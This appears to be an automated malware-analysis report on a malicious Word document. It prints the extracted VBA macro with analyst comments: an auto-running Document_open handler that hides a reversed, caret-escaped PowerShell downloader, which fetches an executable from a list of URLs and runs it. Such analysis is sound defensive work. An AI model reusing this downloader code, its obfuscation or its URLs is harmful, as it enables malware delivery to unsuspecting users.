Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 567162c15a1ca6f0…

MALICIOUS

Office (OLE)

64.8 KB Created: 2018-09-07 14:40:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 1c9806173967c44ba35012cdcb52eba0 SHA-1: 599d079c03883e97460782d39e8d1f28102f1a87 SHA-256: 567162c15a1ca6f05c75779dbddc183c43cab6c917ff86a0fbeec2dfce3faab1
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Word document whose VBA project (carved as macros.bas, below) contains an auto-executing Document_open handler. Apart from dozens of no-op `Month CStr(...)` junk statements, its only effective action is a Shell() call with vbHide that runs a command assembled by helper functions (nqzkoaD(), puAaMFVD() and others): a `cmd /V/C"set IOb=...` line whose payload is caret-escaped and stored back-to-front. Read reversed, the visible fragments are a PowerShell loop that walks an '@'-separated URL list, saves the first successful download as %PUBLIC%\239.exe and runs it with Invoke-Item — i.e. a downloader (T1059.003 Windows Command Shell, T1059.001 PowerShell and T1105 Ingress Tool Transfer apply in addition to the tags above). Further obfuscation: Chr() arithmetic for the characters 'c', 'C' and '"', an `On Error Resume Next` split across line continuations, and random identifier names. The full command line should be decoded end to end to confirm the complete URL list.

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6922866-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6922866-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() is invoked from Document_open with CStr(vbHide) as the window-style argument, so the spawned command runs with a hidden window.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Auto-executing event handler: the code runs as soon as the document is opened with macros enabled, with no further user interaction.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML/DrawingML XML namespace, not an indicator of compromise. The macro's actual download URLs exist only as reversed, caret-escaped string fragments (see nqzkoaD()/puAaMFVD() in the listing below) and were therefore not captured by URL extraction.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6567 bytes
SHA-256: 27ee2830112938b3e1a17bdd0b637cc19311dcb72ecf7bb7b0c01444ce604732
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jjqAcCsVzOQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs this as soon as the document is
' opened with macros enabled (OLE_VBA_DOCOPEN).
Private Sub Document_open()
' "On Error Resume Next", split across four line continuations to hinder
' simple string matching; it swallows every runtime error raised below.
On _
Error _
Resume _
Next
   ' Junk statements: Month() applied to a non-date string, result discarded;
   ' any type-mismatch error is silenced by the handler above. They only pad
   ' the macro and have no effect on the command that is run.
   Month CStr("8963" + "Clfi" + "80" + "wT")
   Month CStr("3505" + "6218" + "zYdSBzMt" + "LOOI")
   Month CStr("rBilkf" + "KBzLLRZvh")
   Month CStr("z" + "s" + "vZl" + "JNvX")
   Month CStr("t" + "9552" + "kI" + "CblR")
   Month CStr("246654939" + "162023883")
' The single effective statement (OLE_VBA_SHELL): runs the concatenated
' command with a hidden window (vbHide = 0). nqzkoaD() and puAaMFVD() return
' caret-escaped pieces of a "cmd /V/C ..." line (see those functions).
' XTzFkzTaQF, YSInciNiUI, MwtEZIBhiND, wznREhFFbnsIm and OvEPizMUNKPNdK are
' not defined in the visible source; an undeclared name evaluates to Empty
' and contributes "" here, but they are presumably defined in the truncated
' part of the module — decode the full command to confirm.
Shell CStr(XTzFkzTaQF) + CStr(YSInciNiUI) + nqzkoaD + puAaMFVD + MwtEZIBhiND + CStr(wznREhFFbnsIm) + CStr(OvEPizMUNKPNdK), CStr(vbHide)
   ' More junk (see above); executed after the command has already been spawned.
   Month CStr("vkdZGp" + "cv" + "5660" + "504240444")
   Month CStr("Fz" + "fkZRPajvSdrAZ" + "402395061" + "cWW")
   Month CStr("2505" + "94812061")
End Sub



Attribute VB_Name = "nIrnOpdpo"
' Returns the first part of the command line that Document_open passes to
' Shell(). Conspicuous characters are built with Chr() arithmetic, every
' token is caret-escaped ("^" is cmd.exe's escape character and is stripped
' when the line is parsed), and from the "set IOb=" payload onward the text
' is stored back-to-front. Reading each fragment reversed, with carets
' removed, yields PowerShell; the cmd side presumably re-reverses it later
' in the command line (not in this function — decode the full line to confirm).
Function nqzkoaD()

On _
Error _
Resume _
Next
' Junk, as in Document_open: Month() on a non-date string, result discarded.
Month CStr("Aj" + "54807151")
' Chr(17+5+12+13+52) = Chr(99) = "c"; Chr(11+3+8+9+36) = Chr(67) = "C";
' Chr(5+1+3+4+21) = Chr(34) = double quote. De-escaped this reads
'   cmd /V/C"set IOb=   (followed by padding spaces)
' /V enables delayed !var! expansion, needed to re-read the IOb variable.
qOVOlTzIR = Chr(17 + 5 + 12 + 13 + 52) + "md" + " /V/" + Chr(11 + 3 + 8 + 9 + 36) + Chr(5 + 1 + 3 + 4 + 21) + "^se^" + "t I^O^b" + "=^ ^  " + "^ ^  " + "   " + "^ " + "^   ^ ^"
Month CStr("N" + "H")
   Month CStr("ELI" + "3009" + "vjPKvzlstjn" + "Lq")
' Reversed and de-escaped: I;break;}catch{}}   (tail of the PowerShell loop;
' Chr(99) = "c" supplies the "c" of "catch" and "break").
JjNRBZfUQQT = " ^  " + "}}" + "{^h" + Chr(17 + 5 + 12 + 13 + 52) + "^" + "ta" + Chr(17 + 5 + 12 + 13 + 52) + "^};k" + "a^" + "er^b" + ";I"
Month CStr("E" + "pp" + "sjtK" + "T")
   Month CStr("Ha" + "8674")
' Reversed: File($WTj, $wSI);Invoke-Item $wS
csIiUiY = "S" + "w^$" + "^ m^e^" + "t^I^-" + "^e^kovn" + "^I" + ";)I" + "S^w" + "^$ ^," + "^j^T^W" + "$(^e^l^" + "iF"
Month CStr("505645656" + "9947" + "4981" + "mDY")
   Month CStr("3245" + "1092" + "138671089" + "350050640")
   Month CStr("95133085" + "8965")
   Month CStr("M" + "N" + "ADSvCrfQlz" + "9394")
   Month CStr("95195421" + "mXD")
' Reversed: $WTj in $MTp){try{$uNS.Download
NEcBta = "^dao^l" + "n" + "wo^D." + "^SN" + "u${yrt^" + "{)^p" + "TM^$^" + " ni j^" + "T" + "W$"
Month CStr("2376" + "cMHqbTWid" + "Ih" + "479946264")
' Reversed (Chr(99) = "c" twice): c+'\'+$aDz+'.exe';foreach(
woDbI = "(" + "h" + Chr(17 + 5 + 12 + 13 + 52) + "aer" + "^o^f;^" + "'^e^x^e" + "^.^'" + "+^z^D" + "a^$" + "^+'" + "\'+" + Chr(17 + 5 + 12 + 13 + 52)
Month CStr("8873" + "6002" + "448641095" + "FInRTiHWm")
   Month CStr("L" + "JBr" + "4896" + "V")
   Month CStr("vXHp" + "188594286" + "OwFvrjLliqDWn" + "Ow")
   Month CStr("5816" + "j" + "bkjcKQ" + "XvNkNFD")
   Month CStr("RPYw" + "oWtkB" + "420247437" + "oY")
' Reversed: $env:publi   (completed by the leading "c" of woDbI)
cUaujUPqFAi = "^i^" + "lb^" + "u^" + "p^:v" + "ne^$^"
Month CStr("ak" + "232908972" + "s" + "20714442")
   Month CStr("u" + "Jrji" + "Rduw" + "nfH")
' Reversed: '239';$wSI=
bzGEwzd = "=^I^S^" + "w^" + "$;'" + "9^3^2" + "'"
Month CStr("lff" + "znMCjZlvC")
   Month CStr("8264" + "408298511" + "3686" + "b")
' Reversed: .Split('@');$aDz =
YlzhZQzjWk = " ^= " + "^" + "zDa$^;)" + "'^@" + "^" + "'" + "(ti" + "lp^S" + "."
Month CStr("332659622" + "VZK")
' Reversed: 400t2SFP4@http://risercable.nl/kW98jLTf'
' Closes a single-quoted, '@'-separated URL list; the earlier entries (and
' the start of the URL these leading characters belong to) are in puAaMFVD.
' These download URLs are not in the report's EMBEDDED_URL findings.
MjjNKo = "'f" + "TL^" + "j89W" + "k/^ln^" + ".e" + "l^ba" + Chr(17 + 5 + 12 + 13 + 52) + "re" + "si" + "r/" + "/^:^p^" + "tth@^4P" + "F^S^2" + "t0^0^" + "4"
' Forward concatenation of the fragments. Read back-to-front from MjjNKo to
' JjNRBZfUQQT, with carets removed, this is:
'   ...kW98jLTf'.Split('@');$aDz = '239';$wSI=$env:public+'\'+$aDz+'.exe';
'   foreach($WTj in $MTp){try{$uNS.DownloadFile($WTj, $wSI);
'   Invoke-Item $wSI;break;}catch{}}
' i.e. try each URL in turn, save the first successful download as
' %PUBLIC%\239.exe and execute it. $MTp and $uNS are assigned elsewhere in
' the command (presumably the Split() result and a web-client object).
nqzkoaD = qOVOlTzIR + JjNRBZfUQQT + csIiUiY + NEcBta + woDbI + cUaujUPqFAi + bzGEwzd + YlzhZQzjWk + MjjNKo
   ' Trailing junk; the return value has already been set.
   Month CStr("rcpu" + "15619119")
   Month CStr("7574" + "7465" + "2313" + "302756700")
   Month CStr("Tt" + "jnU" + "s" + "1111")
   Month CStr("6975" + "XIQDHjm" + "zwZacbrdfipiZd" + "6794")
   Month CStr("6561" + "301349976")
End Function
Function puAaMFVD()

On _
Error _
Resume _
Next
Month CStr("6054" + "zkNXCK")
   Month CStr("103129436" + "Ur" + "lYiXaliFBEOzH" + "kN")
   Month CStr("nHiZXCn" + "507228431")
   Month CStr("jjNSaIomEJr" + "A")
iiWuW = "o/" + "^e^" + "p.s^l" + "^a^tiyi" + "d//^:"
Month CStr("jVGh" + "VXvm")
ABiRaNotYN = "p^tt^" + "h" + "^@K^H" + "k^S^S6" + "^Y" + "/^mo" + Chr(17 + 5 + 12 + 13 + 52) + ".^" + "a^u^h" + "^jn^" + "a" + "uy"
Month CStr("2862" + "XkFls")
   Month CStr("1641" + "2262" + "jdFIUAbWohUw" + "8991")
   Month CStr("393151650" + "q")
   Month CStr("Drn" + "4088")
   Month CStr("5982" + "KOZjvX" + "8100567" + "4682")
QCdlXVTvwc = ".w" + "w^w//^" + ":p^tth@" + Chr(11 + 3 + 8 + 9 + 36) + "V" + "^m" + "w^" + "O" + "^0^Z/m" + "^o" +
... (truncated)